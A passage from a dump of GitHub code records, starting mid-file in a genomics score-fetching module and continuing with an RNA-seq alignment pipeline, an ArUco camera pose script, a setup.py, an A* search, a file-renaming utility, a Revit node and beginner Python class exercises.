DnaAndProtMutationParser, PrematureEnd, UnexpectedToken\nfrom fannsdb.columns import COORD_COLUMNS\nfrom fannsdb.utils import RatedProgress\n\nSTATE_LINE_NUM = \"line_num\"\nSTATE_LINE = \"line\"\nSTATE_MUTATION = \"mutation\"\nSTATE_HITS = \"hits\"\nSTATE_FAILS = \"fails\"\n\ndef fetch_iter(db, muts_path, maps=None, predictors=None, muts_header=False, state=None, logger=None):\n\t\"\"\"\n\tIterator that fetches scores from the database from the mutations in a file.\n\t\n\t:param db: FannsDb interface.\n\t:param muts_path: The input path for mutations.\n\t:param maps: Map transcript/protein ensembl identifiers with external identifiers (swissprot_id, ...)\n\t:param predictors: Predictors for which to obtain the scores.\n\t:param muts_header: Whether the muts_path has a header or not.\n\t:param state: The state of the iteration: hits, fails.\n\t:param logger: Logger to use. If not specified a new one is created.\n\t\"\"\"\n\n\tdef query_mutation(logger, db, mut, maps, predictors):\n\n\t\tif mut.coord == Mutation.GENOMIC:\n\t\t\tif logger.isEnabledFor(logging.DEBUG):\n\t\t\t\tlogger.debug(\" Querying {} {} {} {} {} {} {} ...\".format(\n\t\t\t\t\tmut.chr, mut.start, mut.end or \"*\", mut.ref or \"*\", mut.alt, mut.strand or \"*\", mut.identifier or \"*\"))\n\n\t\t\tfor row in db.query_scores(chr=mut.chr, start=mut.start,\n\t\t\t\t\t\t\t\t\t\t\tref=mut.ref, alt=mut.alt, strand=mut.strand,\n\t\t\t\t\t\t\t\t\t\t\tpredictors=predictors, maps=maps):\n\t\t\t\tyield row\n\n\t\telif mut.coord == Mutation.PROTEIN:\n\t\t\tif logger.isEnabledFor(logging.DEBUG):\n\t\t\t\tlogger.debug(\" Querying {} {} {} {} {} ...\".format(\n\t\t\t\t\tmut.protein, mut.start, mut.ref or \"*\", mut.alt, mut.identifier or \"*\"))\n\n\t\t\tfor row in db.query_scores(protein=mut.protein, aa_pos=mut.start, aa_ref=mut.ref, aa_alt=mut.alt,\n\t\t\t\t\t\t\t\t\t\t\tpredictors=predictors, maps=maps):\n\t\t\t\tyield row\n\n\t\telse:\n\t\t\tlogger.warn(\"Unknown coordinates system: {}\".format(mut.line))\n\n\tif logger is None:\n\t\tlogger = logging.getLogger(\"fannsdb.fetch\")\n\n\tstate = state if state is not None else {}\n\tstate[STATE_HITS] = state[STATE_FAILS] = 0\n\tmaps = maps if maps is not None else []\n\tpredictors = predictors if predictors is not None else []\n\t\n\tlogger.info(\"Reading {} ...\".format(os.path.basename(muts_path) if muts_path != \"-\" else \"from standard input\"))\n\n\tprogress = RatedProgress(logger, name=\"SNVs\")\n\n\twith tsv.open(muts_path) as f:\n\t\tif muts_header:\n\t\t\ttsv.skip_comments_and_empty(f) # this returns the first non empty nor comment line (the header)\n\n\t\tmutparser = DnaAndProtMutationParser()\n\t\tfor line_num, line in enumerate(f, start=1):\n\t\t\tline = line.rstrip(\" \\n\\r\")\n\t\t\tif len(line) == 0 or line.startswith(\"#\"):\n\t\t\t\tcontinue\n\n\t\t\ttry:\n\t\t\t\tmut = mutparser.parse(line)\n\t\t\texcept PrematureEnd:\n\t\t\t\tlogger.error(\"Missing fields at line {}\".format(line_num))\n\t\t\t\tstate[STATE_FAILS] += 1\n\t\t\t\tcontinue\n\t\t\texcept UnexpectedToken as ex:\n\t\t\t\tlogger.error(\"Unexpected field '{}' at line {}\".format(ex.args[0], line_num))\n\t\t\t\tstate[STATE_FAILS] += 1\n\t\t\t\tcontinue\n\n\t\t\tstate.update({\n\t\t\t\tSTATE_LINE_NUM : line_num,\n\t\t\t\tSTATE_LINE : line,\n\t\t\t\tSTATE_MUTATION : mut})\n\n\t\t\texists = False\n\t\t\tfor row in query_mutation(logger, db, mut, maps, predictors):\n\t\t\t\texists = True\n\n\t\t\t\tyield row\n\n\t\t\tprogress.update()\n\n\t\t\tif exists:\n\t\t\t\tstate[STATE_HITS] += 1\n\t\t\telse:\n\t\t\t\tstate[STATE_FAILS] += 1\n\n\tprogress.log_totals()\n\n\thits, fails = [state[k] for k in [STATE_HITS, STATE_FAILS]]\n\tlogger.info(\"Finished. total={}, hits={}, fails={}, elapsed={}\".format(hits + fails, hits, fails, progress.elapsed_time))\n\n\ndef fetch(db, muts_path, out_path, params=None, columns=None, maps=None, predictors=None,\n\t\t labels=None, calc_labels=None, muts_header=False, logger=None):\n\t\n\tparams = params or {}\n\tcolumns = columns or [c.lower() for c in COORD_COLUMNS]\n\tmaps = maps or []\n\tpredictors = predictors or []\n\tlabels = labels or []\n\t\n\tstate = {}\n\t\n\twith tsv.open(out_path, \"w\") as wf:\n\t\t\n\t\tmetadata = db.metadata\n\t\tif \"version\" in metadata:\n\t\t\ttsv.write_param(wf, \"db-version\", db.metadata[\"version\"])\n\t\ttsv.write_param(wf, \"fetched\", dt.now().strftime(\"%Y-%m-%d %H:%M:%S\"))\n\t\tfor k, v in params.items():\n\t\t\ttsv.write_param(wf, k, v)\n\t\n\t\ttsv.write_line(wf, \"ID\", *[c.upper() for c in columns] + [m.upper() for m in maps] + predictors + labels)\n\t\n\t\tfor row in fetch_iter(db, muts_path, maps=maps, predictors=predictors,\n\t\t\t\t\t\t\t muts_header=muts_header, state=state, logger=logger):\n\t\t\t\n\t\t\tif calc_labels is not None:\n\t\t\t\tlabels = calc_labels(row) or {}\n\t\t\telse:\n\t\t\t\tlabels = {}\n\t\n\t\t\txrefs = row[\"xrefs\"]\n\t\t\tscores = row[\"scores\"]\n\n\t\t\ttsv.write_line(wf, state[STATE_MUTATION].identifier,\n\t\t\t\t *[row[c] for c in columns]\n\t\t\t\t + [xrefs[m] for m in maps]\n\t\t\t\t + [scores[p] for p in predictors]\n\t\t\t\t + [labels.get(l, \"\") for l in labels])\n\t\n\treturn {k : state[k] for k in [STATE_HITS, STATE_FAILS]}","repo_name":"chris-zen/phd-thesis","sub_path":"chapter3/fannsdb/fannsdb/ops/fetch.py","file_name":"fetch.py","file_ext":"py","file_size_in_byte":4903,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"12430559281","text":"#!/usr/bin/env python3\nimport sys\nsys.path.append('/cephfs/users/mbrown/PIPELINES/RNAseq/')\nimport os\nimport re\nfrom utility.date_time import date_time\nimport subprocess\nimport json\nfrom utility.log import log\nfrom alignment.cutadapter import cutadapter\nfrom alignment.fastqc import fastqc\nfrom alignment.bwt2_pe import bwt2_pe\nfrom alignment.novosort_sort_pe import novosort_sort_pe\nfrom alignment.picard_insert_size import picard_insert_size\nfrom alignment.qc_bam import qc_bam\nfrom alignment.filter_wrap import filter_wrap\nfrom alignment.star import star\nfrom subprocess import call\nfrom alignment.parse_qc import parse_qc\nfrom utility.set_acls import set_acls\n\n\nclass Pipeline:\n def __init__(self, end1, end2, json_config):\n self.json_config = json_config\n self.sf1 = end1\n self.sf2 = end2\n self.end1 = os.path.basename(self.sf1)\n self.end2 = os.path.basename(self.sf2)\n self.status = 0\n self.config_data = json.loads(open(self.json_config, 'r').read())\n s = re.match('^(\\S+)_1_sequence\\.txt\\.gz$', self.end1)\n if s:\n self.sample = s.group(1)\n else:\n s = re.match('(^\\S+)_\\D*\\d\\.f\\w*q\\.gz$', self.end1)\n self.sample = s.group(1)\n\n HGACID = self.sample.split(\"_\")\n self.bnid = HGACID[0]\n self.fastqc_tool = self.config_data['tools']['fastqc']\n self.java_tool = self.config_data['tools']['java']\n self.picard_tool = self.config_data['tools']['picard']\n self.novosort = self.config_data['tools']['novosort']\n self.bwt2_tool = self.config_data['tools']['bwt2']\n self.bwt2_ref = self.config_data['refs']['bwt2']\n self.samtools_tool = self.config_data['tools']['samtools']\n self.picard_tmp = 'picard_tmp'\n self.star_tool = self.config_data['tools']['star']\n self.pdxflag = self.config_data['params']['pdxflag']\n self.skip_cut = self.config_data['params']['skip_cut']\n if self.pdxflag == 'Y':\n self.mmu_filter = self.config_data['tools']['mouse_filter']\n self.mmu_star_ref = self.config_data['refs']['mmu_star']\n self.hsa_star_ref = self.config_data['refs']['hsa_star']\n self.genome_ref = self.config_data['refs']['genome']\n self.samtools_ref = self.config_data['refs']['samtools']\n self.gtf_ref = self.config_data['refs']['gtf']\n self.tx = self.config_data['refs']['transcriptome']\n self.align_dir = self.config_data['refs']['align_dir']\n self.project = self.config_data['refs']['project']\n self.project_dir = self.config_data['refs']['project_dir']\n self.cwd = self.project_dir + self.project + '/' + self.align_dir + '/' + self.bnid + '/' + self.sample\n self.user = self.config_data['params']['user']\n self.group = self.config_data['params']['group']\n self.threads = self.config_data['params']['threads']\n self.ram = self.config_data['params']['ram']\n self.sf = self.config_data['params']['stranded']\n self.bam_dir = 'BAMS/'\n self.qc_dir = 'QC/'\n self.log_dir = 'LOGS/'\n self.star_dir = 'STAR_OUT/'\n self.fq_trimmed = 'TRIMMED_FQ/'\n self.loc = self.log_dir + self.sample + '.pipe.log'\n self.pipeline()\n\n def pipeline(self):\n # temp line to source environment variables until compute is restarted\n src_env = '. /etc/environment'\n call(src_env, shell=True)\n\n # create working directory\n if not os.path.isdir(self.cwd):\n mk_cwd = 'mkdir -p ' + self.cwd\n sys.stderr.write(date_time() + 'Creating working directory ' + mk_cwd + '\\n')\n call(mk_cwd, shell=True)\n os.chdir(self.cwd)\n if not os.path.isdir(self.log_dir):\n mk_log_dir = 'mkdir ' + self.log_dir\n call(mk_log_dir, shell=True)\n log(self.loc, date_time() + 'Made log directory ' + self.log_dir + \"\\n\")\n if not os.path.isdir(self.fq_trimmed):\n mk_fq_dir = 'mkdir ' + self.fq_trimmed\n call(mk_fq_dir, shell=True)\n log(self.loc, date_time() + 'Made fastq trimmed directory ' + self.fq_trimmed + \"\\n\")\n os.chdir(self.fq_trimmed)\n mv_fq = 'mv ../' + self.log_dir + ' .'\n call(mv_fq, shell=True)\n log(self.loc, date_time() + 'Changed into ' + self.fq_trimmed + \" and moved log directory there\\n\")\n if not os.path.isdir(self.star_dir):\n mk_star_dir = 'mkdir ' + self.star_dir\n call(mk_star_dir, shell=True)\n log(self.loc, date_time() + 'Made star output directory ' + self.star_dir + \"\\n\")\n if not os.path.isdir(self.bam_dir):\n mk_bam_dir = 'mkdir ' + self.bam_dir\n call(mk_bam_dir, shell=True)\n log(self.loc, date_time() + 'Made bam output directory ' + self.bam_dir + \"\\n\")\n if not os.path.isdir(self.qc_dir):\n mk_qc_dir = 'mkdir ' + self.qc_dir\n call(mk_qc_dir, shell=True)\n log(self.loc, date_time() + 'Made qc directory ' + self.qc_dir + \"\\n\")\n log(self.loc,\n date_time() + \"Starting alignment qc for paired end sample files \" + self.end1 + \" and \" + self.end2 + \"\\n\")\n\n # remove adapters\n if self.skip_cut == 'N':\n check = cutadapter(self.sample, self.sf1, self.sf2, self.json_config)\n if check != 0:\n log(self.loc, date_time() + 'cutadapt failure for ' + self.sample + '\\n')\n exit(1)\n\n # start fastqc, will run while insert size being calculated\n\n end_ss1 = self.sample + '_1.subset.fastq'\n end_ss2 = self.sample + '_2.subset.fastq'\n subset = self.sample + '_subset'\n\n ss_cmd = 'gunzip -c ' + self.end1 + ' | head -n 4000000 > ' + end_ss1\n subprocess.call(ss_cmd, shell=True)\n ss_cmd = 'gunzip -c ' + self.end2 + ' | head -n 4000000 > ' + end_ss2\n subprocess.call(ss_cmd, shell=True)\n # check certain key processes\n\n check = bwt2_pe(self.bwt2_tool, self.tx, end_ss1, end_ss2, self.samtools_tool, self.samtools_ref, subset,\n self.threads, self.log_dir)\n if check != 0:\n log(self.loc, date_time() + 'Bowtie2 failure for ' + self.sample + '\\n')\n self.status = 1\n exit(1)\n check = novosort_sort_pe(self.novosort, subset, self.log_dir, self.threads,\n self.ram, 'coord') # rest won't run until completed\n if check != 0:\n log(self.loc, date_time() + 'novosort sort failure for ' + self.sample + '\\n')\n self.status = 1\n exit(1)\n (x, s) = picard_insert_size(self.java_tool, self.picard_tool, subset, self.log_dir)\n log(self.loc, date_time() + 'Running qc on fastq file\\n')\n fastqc(self.fastqc_tool, self.sample, self.end1, self.end2, self.threads)\n if self.pdxflag == 'Y':\n log(self.loc, date_time() + 'Aligning and filtering reads for mouse contamination')\n check = filter_wrap(self.mmu_filter, self.star_tool, self.mmu_star_ref, self.end1, self.end2,\n self.sample, self.log_dir, self.threads, self.novosort, self.ram)\n if check != 0:\n log(self.loc, date_time() + 'Read filter failure for ' + self.sample + '\\n')\n exit(1)\n log(self.loc, date_time() + 'Performing star alignment ' + self.sample + '\\n')\n check = star(self.star_tool, self.hsa_star_ref, self.end1, self.end2, self.sample, self.log_dir,\n self.threads, self.sf)\n else:\n log(self.loc, date_time() + 'Starting star align\\n')\n check = star(self.star_tool, self.genome_ref, self.end1, self.end2, self.sample, self.log_dir, self.threads,\n self.sf)\n\n if check != 0:\n log(self.loc, date_time() + 'star alignment failure for ' + self.sample + '\\n')\n self.status = 1\n exit(1)\n # run QC on bams\n log(self.loc, date_time() + 'Running bam QC on ' + self.sample + '\\n')\n check = qc_bam(self.sample, self.json_config)\n if check != 0:\n log(self.loc, date_time() + 'bam qc process failure for ' + self.sample + '\\n')\n self.status = 1\n exit(1)\n log(self.loc, date_time() + 'Creating QC summary\\n')\n check = parse_qc(self.json_config, self.sample)\n if check != 0:\n log(self.loc, date_time() + 'qc summary failure for ' + self.sample + '\\n')\n self.status = 1\n exit(1)\n # move outputs to correct directories\n log(self.loc, date_time() + 'Organizing outputs\\n')\n mv_bams = 'mv *Aligned*.bam ' + self.bam_dir\n call(mv_bams, shell=True)\n mv_star = 'mv *.tab ' + self.star_dir\n call(mv_star, shell=True)\n if self.pdxflag == 'Y':\n mv_filt_log = 'mv *.runlog.txt ' + self.qc_dir\n call(mv_filt_log, shell=True)\n mv_sub = 'mv *subset.insert* *.txt *.pdf *.json ' + self.qc_dir + '; cp ' + self.json_config + ' ' + self.qc_dir\n call(mv_sub, shell=True)\n # set acls and mv subdirectories to right place\n set_acls('./', self.user, self.group)\n mv_dir = 'mv ' + ' '.join((self.bam_dir, self.log_dir, self.qc_dir, self.star_dir)) + ' ../'\n call(mv_dir, shell=True)\n rm_tmp = 'rm -rf *STAR* *subset*'\n call(rm_tmp, shell=True)\n\n os.chdir('../../')\n sys.stderr.write(date_time() + 'Moving subdirs out of ' + self.sample + '\\n')\n mv_dirs = 'mv ' + self.sample + '/* .'\n call(mv_dirs, shell=True)\n rm_lane = 'rmdir ' + self.sample\n call(rm_lane, shell=True)\n\n sys.stderr.write(date_time() + 'Pipeline complete for ' + self.sample + '\\n')\n self.status = 0\n\n\ndef main():\n import argparse\n parser = argparse.ArgumentParser(description='RNA alignment paired-end QC pipeline')\n parser.add_argument('-f1', '--file1', action='store', dest='end1', help='First fastq file')\n parser.add_argument('-f2', '--file2', action='store', dest='end2', help='Second fastq file')\n parser.add_argument('-j', '--json', action='store', dest='config_file',\n help='JSON config file containing tool and reference locations')\n\n if len(sys.argv) == 1:\n parser.print_help()\n sys.exit(1)\n\n inputs = parser.parse_args()\n\n end1 = inputs.end1\n end2 = inputs.end2\n config_file = inputs.config_file\n Pipeline(end1, end2, config_file)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"WhiteLab/RNAseq","sub_path":"alignment/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":10713,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"74110209524","text":"import numpy as np\r\nimport cv2\r\nimport cv2.aruco as aruco\r\n\r\n\r\n# ***\r\n# Load camera parameters (prior calibration needed) and use them to estimade pose of found ArUco markers\r\n# This is happening live on the computer's camera (with correct camera name and camera source it would work for any calibrated\r\n# camera)\r\n# \r\n# pres q to quit\r\n# \r\n# ***\r\n\r\n\r\n\r\n# Load camera parameters:\r\ncameraName = 'EriksLaptopCam'\r\nfolderName = 'CameraCalibration/'\r\ncamParamsName = folderName + cameraName + '.npz'\r\ncamParams = np.load(camParamsName) \r\n\r\nretVal = camParams['retVal']\r\ncameraMatrix = camParams['cameraMatrix']\r\ndistCoeffs = camParams['distCoeffs'] \r\nrvecsCalib = camParams['rvecs']\r\ntvecsCalib = camParams['tvecs']\r\n# print(retVal, cameraMatrix, distCoeffs, rvecsCalib, tvecsCalib)\r\nprint('Camera parameters loaded.')\r\n\r\n\r\ncap = cv2.VideoCapture(0)\r\n\r\nwhile(True):\r\n # Capture frame-by-frame\r\n ret, frame = cap.read()\r\n #print(frame.shape) #480x640\r\n # Our operations on the frame come here\r\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\r\n aruco_dict = aruco.Dictionary_get(aruco.DICT_6X6_250)\r\n parameters = aruco.DetectorParameters_create()\r\n\r\n #print(parameters)\r\n\r\n ''' detectMarkers(...)\r\n detectMarkers(image, dictionary[, corners[, ids[, parameters[, rejectedI\r\n mgPoints]]]]) -> corners, ids, rejectedImgPoints\r\n '''\r\n #lists of ids and the corners beloning to each id\r\n corners, ids, rejectedImgPoints = aruco.detectMarkers(gray, aruco_dict, parameters=parameters)\r\n # print(corners)\r\n print(f'ArUco markers found: {len(corners)}')\r\n\r\n #It's working.\r\n # my problem was that the cellphone put black all around it. The alrogithm\r\n # depends very much upon finding rectangular black blobs\r\n\r\n # gray = aruco.drawDetectedMarkers(gray, corners, ids, (0,255,0))\r\n frame = aruco.drawDetectedMarkers(frame, corners, ids, (0,255,0))\r\n\r\n\r\n \r\n rvecs, tvecs, objPoints= aruco.estimatePoseSingleMarkers(corners, 70, cameraMatrix, distCoeffs)\r\n\r\n for i in range(len(corners)):\r\n rvec = rvecs[i]\r\n tvec = tvecs[i] \r\n frame = aruco.drawAxis(frame, cameraMatrix, distCoeffs, rvec, tvec, 35)\r\n \r\n\r\n\r\n #print(rejectedImgPoints)\r\n # Display the resulting frame\r\n cv2.imshow('frame', frame)\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n\r\n# When everything done, release the capture\r\ncap.release()\r\ncv2.destroyAllWindows()","repo_name":"plerik/RV-cameraLocalization","sub_path":"ArucoMarkers/code_Pose_DetectionCamera.py","file_name":"code_Pose_DetectionCamera.py","file_ext":"py","file_size_in_byte":2448,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"18880178530","text":"import os\nimport sys\nfrom setuptools import setup, find_packages, Extension\nfrom setuptools.command.build_ext import build_ext\n\nsys.path.insert(0, os.path.abspath('.'))\nfrom atom.version import __version__\n\n# Use the env var ATOM_DISABLE_FH4 to disable linking against VCRUNTIME140_1.dll\n\next_modules = [\n Extension(\n 'atom.catom',\n [\n 'atom/src/atomlist.cpp',\n 'atom/src/atomdict.cpp',\n 'atom/src/atomset.cpp',\n 'atom/src/atomref.cpp',\n 'atom/src/catom.cpp',\n 'atom/src/catommodule.cpp',\n 'atom/src/defaultvaluebehavior.cpp',\n 'atom/src/delattrbehavior.cpp',\n 'atom/src/enumtypes.cpp',\n 'atom/src/eventbinder.cpp',\n 'atom/src/getattrbehavior.cpp',\n 'atom/src/member.cpp',\n 'atom/src/memberchange.cpp',\n 'atom/src/methodwrapper.cpp',\n 'atom/src/observerpool.cpp',\n 'atom/src/postgetattrbehavior.cpp',\n 'atom/src/postsetattrbehavior.cpp',\n 'atom/src/postvalidatebehavior.cpp',\n 'atom/src/propertyhelper.cpp',\n 'atom/src/setattrbehavior.cpp',\n 'atom/src/signalconnector.cpp',\n 'atom/src/validatebehavior.cpp',\n ],\n include_dirs=['src'],\n language='c++',\n ),\n Extension(\n 'atom.datastructures.sortedmap',\n ['atom/src/sortedmap.cpp'],\n include_dirs=['src'],\n language='c++',\n ),\n]\n\n\nclass BuildExt(build_ext):\n \"\"\" A custom build extension for adding compiler-specific options.\n\n \"\"\"\n c_opts = {\n 'msvc': ['/EHsc'],\n }\n\n def initialize_options(self):\n build_ext.initialize_options(self)\n self.debug = False\n\n def build_extensions(self):\n\n # Delayed import of cppy to let setup_requires install it if necessary\n import cppy\n\n ct = self.compiler.compiler_type\n opts = self.c_opts.get(ct, [])\n for ext in self.extensions:\n ext.include_dirs.insert(0, cppy.get_include())\n ext.extra_compile_args = opts\n if sys.platform == 'darwin':\n ext.extra_compile_args += ['-stdlib=libc++']\n ext.extra_link_args += ['-stdlib=libc++']\n if (ct == 'msvc' and os.environ.get('ATOM_DISABLE_FH4')):\n # Disable FH4 Exception Handling implementation so that we don't\n # require VCRUNTIME140_1.dll. For more details, see:\n # https://devblogs.microsoft.com/cppblog/making-cpp-exception-handling-smaller-x64/\n # https://github.com/joerick/cibuildwheel/issues/423#issuecomment-677763904\n ext.extra_compile_args.append('/d2FH4-')\n build_ext.build_extensions(self)\n\n\nsetup(\n name='atom',\n version=__version__,\n author='The Nucleic Development Team',\n author_email='sccolbert@gmail.com',\n url='https://github.com/nucleic/atom',\n description='Memory efficient Python objects',\n long_description=open('README.rst').read(),\n license='BSD',\n classifiers=[\n # https://pypi.org/pypi?%3Aaction=list_classifiers\n 'License :: OSI Approved :: BSD License',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7',\n 'Programming Language :: Python :: 3.8',\n 'Programming Language :: Python :: 3.9',\n 'Programming Language :: Python :: Implementation :: CPython',\n ],\n python_requires='>=3.6',\n setup_requires=['cppy>=1.1.0'],\n packages=find_packages(exclude=['tests', 'tests.*']),\n ext_modules=ext_modules,\n cmdclass={'build_ext': BuildExt},\n)\n","repo_name":"PierreAndre24/atom","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"76"} +{"seq_id":"12287774081","text":"from pqueue import PriorityQueue\n\nclass Graph:\n \"\"\"\n Abstract graph.\n Inherit from this class and implement its methods to have a working Graph\n \"\"\"\n def getChildren(self, position):\n pass\n\n def getHCost(self, position, goal):\n '''\n Heuristic value of a certain node. For a dijkstra implementation, return always 0\n '''\n return 0\n\nclass Node:\n def __init__(self, position, cost=0, parent=None):\n # State representation. It can be a tuple, an integer, \n # or any data structure that holds your current state for this node\n self.position = position\n self.cost = cost\n self.parent = parent\n\ndef astar(graph, start, goal):\n # Fringe. Nodes not visited yet\n openList = PriorityQueue()\n\n # Visited Nodes. Each one will store it's parent position\n closedList = {}\n\n node = Node(start)\n openList.push(node)\n\n while openList:\n node, _ = openList.pop()\n position, cost = node.position, node.cost\n\n if position in closedList:\n # Oops. Already expanded.\n continue\n\n # Save the node in the closed list, and keep track of its parent\n closedList[position] = node.parent\n if position == goal:\n break\n for childPosition, actionCost in graph.getChildren(position):\n # Only add to the open list if it's not expanded yet\n if not childPosition in closedList:\n childNode = Node(childPosition, cost + actionCost, position)\n openList.push(childNode, childNode.cost + graph.getHCost(childPosition, goal))\n\n path = []\n if position == goal:\n # Ensure a path has been found\n path.insert(0, position)\n while position and position != start:\n position = closedList[position]\n path.insert(0, position)\n\n return path\n","repo_name":"neo4u/neophyte","sub_path":"graphs/concepts/astar.py","file_name":"astar.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"37515487092","text":"import pdb\nimport os, sys\n\ndef rename_fit_files(expDir, orig_date, new_date, dryRun=1):\n ''' Simple func. to fix mistake in fitList -- make the date 220206 instead of 210206\n '''\n curr_loc = os.getcwd() + '/';\n full_path = curr_loc + expDir + 'structures/';\n files = os.listdir(full_path);\n for f in files:\n if f.find(orig_date) >= 0:\n old_name = f;\n new_name = f.replace(orig_date, new_date);\n print('renaming %s to %s' % (old_name, new_name));\n if dryRun == 0:\n os.rename(full_path + old_name, full_path + new_name);\n \n\ndef rename_files(loc_data, files, fileExt='.xml', mBase='m6', trialRun=1, isDataList=False):\n # used for renaming files within a directory to pad numbers up to 2 digits\n # - i.e. m675p4r9 to m675p04r09\n # can also be used to rename files in a dataList if fileExt='' and files is the list of names in the dataList\n # trialRun: if True, just print what would be the renaming, but don't do it\n # if False, then actually rename\n\n for ind, i in enumerate(files):\n# if i.find('#') >= 0:\n# os.rename(loc_data + i, loc_data + i.replace('#', ''))\n# print('IGNORE: renaming %s to %s' % (loc_data + i, loc_data + i.replace('#', '')))\n\n if i.find(mBase) >=0 and i.find(fileExt) >= 0: # .mat; or change to .xml/.exxd if changing names in /recordings\n\n ########\n # first, figure out where the meaningful part of the program name ends\n ########\n if isDataList: # why treat separately? well, some dataList entries have m###pN_blahblah, others are m#pN#Z\n endInd = i.find('_');\n if endInd == -1: # i.e.\n endInd = i.find('#') # if there isn't '_', then find '#'\n if endInd == -1:\n endInd = len(i); # then, just get the end\n else:\n if 'structures' in loc_data:\n endInd = i.find('_') # if changing in /structures/\n elif 'recordings' in loc_data:\n endInd = i.find('#') # if changing in /recordings/;\n else:\n print('uhoh...are you sure you are renaming the right directory?');\n endInd = 0;\n\n\n ## updating unit number ([r/l]##)\n try:\n r_ind = i.find('r'); # if updating r (unit number)\n if r_ind < 0 or r_ind > endInd: # i.e. then there is an R in the program name...\n r_ind = i.find('l')\n substr_to_replace = i[r_ind+1:endInd]\n #print('substr: %s' % substr_to_replace)\n new_str = i[0:r_ind+1] + '%02d' % int(substr_to_replace) + i[endInd:]\n except:\n new_str = i;\n\n ## updating penetration number (p##)\n try:\n p_ind = new_str.find('p'); # if updating p (penetration number)\n pEnd_ind = new_str.find('r') # if changing in /recordings/; will be \"r\" or \"l\"\n if pEnd_ind > endInd or pEnd_ind < 0: # i.e. the \"r\" is in the program name! or not here at all\n pEnd_ind = new_str.find('l');\n substr_to_replace = new_str[p_ind+1:pEnd_ind]\n #print('substr: %s' % substr_to_replace)\n new_str2 = new_str[0:p_ind+1] + '%02d' % int(substr_to_replace) + new_str[pEnd_ind:]\n except:\n new_str2 = new_str;\n\n ## finally, the part that applies to both!\n if new_str2 == i:\n continue;\n \n if trialRun == 1:\n print('renaming %s to %s' % (i, new_str2))\n else:\n os.rename(loc_data + i, loc_data + new_str2)\n\n files[ind] = new_str2;\n\n return files;\n\nif __name__ == \"__main__\":\n\n if len(sys.argv) < 2:\n print('Need one argument, at least! Folder to look into');\n \n loc_data = sys.argv[1];\n try:\n fileExt = sys.argv[2];\n except:\n fileExt = '.xml';\n try:\n mBase = sys.argv[3];\n except:\n mBase = 'm6';\n try:\n trRun = int(sys.argv[4]);\n except:\n trRun = 1;\n\n files = os.listdir(loc_data);\n\n rename_files(loc_data, files, fileExt, mBase, trRun);\n","repo_name":"paul-levy/SF_diversity","sub_path":"rename_files.py","file_name":"rename_files.py","file_ext":"py","file_size_in_byte":3974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"20820362553","text":"import clr\nclr.AddReference('RevitAPI')\nfrom Autodesk.Revit.DB import *\n\ndef IsTopoSubregion(topo):\n\tif hasattr(topo, \"IsSiteSubRegion\"): return topo.IsSiteSubRegion\n\telse: return False\n\ntopos = UnwrapElement(IN[0])\n\nif isinstance(IN[0], list): OUT = [IsTopoSubregion(x) for x in topos]\nelse: OUT = IsTopoSubregion(topos)","repo_name":"andydandy74/ClockworkForDynamo","sub_path":"nodes/2.x/python/Topography.IsSubregion.py","file_name":"Topography.IsSubregion.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","stars":207,"dataset":"github-code","pt":"76"} +{"seq_id":"32672841423","text":"import math\r\n\r\n#1\r\n#リンゴと言われて思い浮かぶ、4つの属性を考えよう。\r\n#4つの属性をインスタンス変数に持つ、Apppleクラスを定義しよう\r\nprint(\"--challenge 1--\")\r\n\r\nclass Apple:\r\n def __init__(self, color, size, weight, sweet):\r\n self.color = color\r\n self.size = size\r\n self.weight = weight\r\n self.sweet = sweet\r\n\r\n#2\r\n#円を表すCircleクラスを定義しよう。\r\n#そのクラスに、面積を計算して返すメソッドareaをもたせよう。\r\n#面積の計算には、Pythonの組み込みモジュールmathのpi定数が使えます。\r\n#次にCircleオブジェクトを作って、areaメソッドを呼び出し、結果を出力しよう。\r\nprint(\"--challenge 2--\")\r\n\r\nclass Circle:\r\n def __init__(self, r):\r\n self.radius = r\r\n\r\n def area(self):\r\n return self.radius * self.radius * math.pi\r\n\r\nmyCircle = Circle(10)\r\nprint(myCircle.area())\r\n\r\n#3\r\n#三角形を表すTriangleクラスを定義して、面積を返すareaメソッドを持たせよう。\r\n#そしてTriangleオブジェクトをつくって、areaメソッドを呼び出して、結果を出力しよう。\r\nprint(\"--challenge 3--\")\r\n\r\nclass Triangle:\r\n def __init__(self, b, h):\r\n self.bottom = b\r\n self.height = h\r\n\r\n def area(self):\r\n return self.bottom * self.height / 2\r\n\r\nmyTriangle = Triangle(5, 8)\r\nprint(myTriangle.area())\r\n\r\n#4\r\n#六角形を表すHexagonクラスを定義しよう。\r\n#そのクラスには、外周の長さを計算して返すメソッドcaluculate_perimeterを定義しよう。\r\n#そして、Hexagonオブジェクトを作ってcaluculate_perimeterメソッドを呼び出し、結果を出力しよう。\r\nprint(\"--challenge 4--\")\r\n\r\nclass Hexagon():\r\n def __init__(self, s1, s2, s3, s4, s5, s6):\r\n self.s1 = s1\r\n self.s2 = s2\r\n self.s3 = s3\r\n self.s4 = s4\r\n self.s5 = s5\r\n self.s6 = s6\r\n\r\n def calculate_perimeter(self):\r\n return self.s1 + self.s2 + self.s3 + self.s4 + self.s5 + self.s6\r\n\r\na_hexagon = Hexagon(1, 2, 3, 4, 5, 6)\r\nprint(a_hexagon.calculate_perimeter())\r\n","repo_name":"matabe0320/the-self-taught-programer","sub_path":"Challenge_012.py","file_name":"Challenge_012.py","file_ext":"py","file_size_in_byte":2175,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} 